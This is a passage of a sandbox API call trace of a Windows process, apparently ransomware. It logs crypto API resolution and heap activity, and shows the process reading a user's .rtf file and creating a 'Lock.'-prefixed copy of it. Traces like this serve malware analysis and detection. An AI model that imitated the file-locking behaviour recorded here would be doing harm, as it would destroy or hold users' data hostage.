lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0198.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466d90 [0198.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0198.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0198.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.346] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0198.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0198.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.346] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.349] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0198.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0198.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0198.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/enrHxcENdtYHa.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\enrhxcendtyha.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0198.354] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.355] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0198.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0198.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.enrHxcENdtYHa.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.enrhxcendtyha.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0198.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0198.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0198.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0198.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.356] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0198.356] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x13e7, lpOverlapped=0x0) returned 1 [0198.357] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0198.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13e7) returned 0x24f7260 [0198.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0198.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.358] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0198.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0198.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13e7) returned 0x24f7260 [0198.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 